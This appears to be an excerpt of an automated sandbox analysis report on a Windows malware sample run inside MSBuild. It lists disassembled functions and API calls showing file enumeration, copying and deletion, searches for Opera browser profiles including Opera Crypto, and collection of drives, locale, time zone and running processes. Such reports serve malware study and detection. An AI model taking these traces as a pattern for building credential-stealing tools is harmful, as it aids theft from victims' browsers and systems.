                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401B61
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: LocalFree.KERNEL32(?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F21
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00401BE1
                                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 00401C34
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000), ref: 00401C43
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                              • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                            • String ID: %$L3B$\*.*
                                                                                                                                                                                                                                                                            • API String ID: 2220404975-1614187093
                                                                                                                                                                                                                                                                            • Opcode ID: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
                                                                                                                                                                                                                                                                            • Instruction ID: 1f0ecdccfbf971c4eb3ba04f5591d09edb7ba5691986d76eb2288118b31a76ee
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9c562cef0e5a590ee84e2ec893f91183f8c785d922770ffd99f33c19f8637d8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5726B70801248EADB15EBA5C951BDDBBB85F19308F5440BEE605732D2DF782B4CCB69
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00416CF0 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 155stringfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00416D2B
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00416D42
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004276A4), ref: 00416D7C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004276A8), ref: 00416D96
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00E39A50), ref: 00416DD4
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00E39960), ref: 00416DE8
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416DFC
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416E0A
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,004276AC), ref: 00416E1C
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416E30
                                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00416ED1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$FileFind$FirstNextwsprintf
                                                                                                                                                                                                                                                                            • String ID: %s\%s$1pA
                                                                                                                                                                                                                                                                            • API String ID: 111849568-634091350
                                                                                                                                                                                                                                                                            • Opcode ID: 5b2b6f63b55e1f6505acacb7ac47ca8445766713d8ba3f9fb089b02034eb06fe
                                                                                                                                                                                                                                                                            • Instruction ID: 2cb9bfa35f18a05ea18699b2ebf9ea07bfb25382f6a54c62d3d11893d13825a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b2b6f63b55e1f6505acacb7ac47ca8445766713d8ba3f9fb089b02034eb06fe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D751F4B5800218ABDB14EBA0CC85FEE777DAB48310F00469EFA15A3191D778A748CBE4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040B030 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 658fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00426ABB,?,?,00000000), ref: 0040B0C2
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426CF8,?,00000000), ref: 0040B13C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426CFC,?,00000000), ref: 0040B156
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera,00426ACA,00426AC7,00426AC6,00426AC3,00426AC2,00426ABF,00426ABE,?,00000000), ref: 0040B1EB
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,?,00000000), ref: 0040B203
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera Crypto,?,00000000), ref: 0040B21B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                            • String ID: :$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                                            • API String ID: 2567437900-1444899082
                                                                                                                                                                                                                                                                            • Opcode ID: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                                                            • Instruction ID: efbda9057b4a3320160d0838e4bb094c7ba51aae6ab1d3ada1da399397eb047e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d42b56d7676d8b34d9992f1e80027433cf82ce389d1765d60d0a489b8323c70
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31528030901248EACB15EBA5C955BDDBBB99F19304F5040BEE505732D2DBB82B4CCBB6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004168E0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 177stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416959
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041697E
                                                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,?,?,00000004), ref: 00416987
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004169A6
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004169C4
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004169E7
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00416A4E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                                            • API String ID: 1884655365-147700698
                                                                                                                                                                                                                                                                            • Opcode ID: d7aebe20fdd1c2a3f997332edf9cf354093250a779c0c78778188edb4f5eaf6f
                                                                                                                                                                                                                                                                            • Instruction ID: 2ef20b39a4741f89efdf50063d3a739dc061204c8983723d5aff4085e6fe27b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7aebe20fdd1c2a3f997332edf9cf354093250a779c0c78778188edb4f5eaf6f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A961D3B1500244ABDB30EF61DC45FEE3B79AF05704F50815EF90963292DF78AA89CB69
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040A530 Relevance: 13.8, APIs: 9, Instructions: 329fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,00426AAF,00000000,?,00426CB0,?,?,00426AAF,?,00000004), ref: 0040A5C1
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426CB4), ref: 0040A5FD
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426CB8), ref: 0040A617
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E38DF0,00000000,?,?,?,00426CBC,?,?,00426AB2), ref: 0040A6AC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2567437900-0
                                                                                                                                                                                                                                                                            • Opcode ID: 565b7303810139da5bb3f9f41aee74555440f8ba8e901c0de02f130a5aa14c2d
                                                                                                                                                                                                                                                                            • Instruction ID: 37905d91ebad19cbda5eda32a3e59e51b24659bb580c75c62476da3a2a5a7917
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 565b7303810139da5bb3f9f41aee74555440f8ba8e901c0de02f130a5aa14c2d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDD18071901248EACB14EBB5C9466DDBBB9AF19344F10817EE901732D2DB785B0CCBE6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,0042708F,?,?,00000001), ref: 004103B7
                                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004103C9
                                                                                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004103D4
                                                                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                                                                            • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                                            • Opcode ID: ab2540c32def370dc3ccb5b7f219a36ccb40806ac267110b0901d9de57956097
                                                                                                                                                                                                                                                                            • Instruction ID: c556474e9021bd53722cce9fd1be39607c0121b4687c47c7bc64da4ab7de49f3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab2540c32def370dc3ccb5b7f219a36ccb40806ac267110b0901d9de57956097
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67317371900219EBDB10DFD9DC85BEEB7B9FB48704F50406EF605A3281DB785A84CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410311
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410318
                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00410327
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410352
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                            • String ID: wwww
                                                                                                                                                                                                                                                                            • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                            • Opcode ID: 9a7f8c275463387799c76c2b5357eec89d0a484b96840c6e095eb03c68c04584
                                                                                                                                                                                                                                                                            • Instruction ID: 05270ee5c02940d31badd105e9dc8504ebe92e995e35f2b1e0709388ccb36dab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a7f8c275463387799c76c2b5357eec89d0a484b96840c6e095eb03c68c04584
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BF0A775B00224ABE71C5B689C0EFAA7B1E9B46311F044365FE1ACB2D0DA70581446D5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410AA0 Relevance: 7.6, APIs: 5, Instructions: 80processCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410AEF
                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00410AFF
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00410B11
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 00410B7E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410B89
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
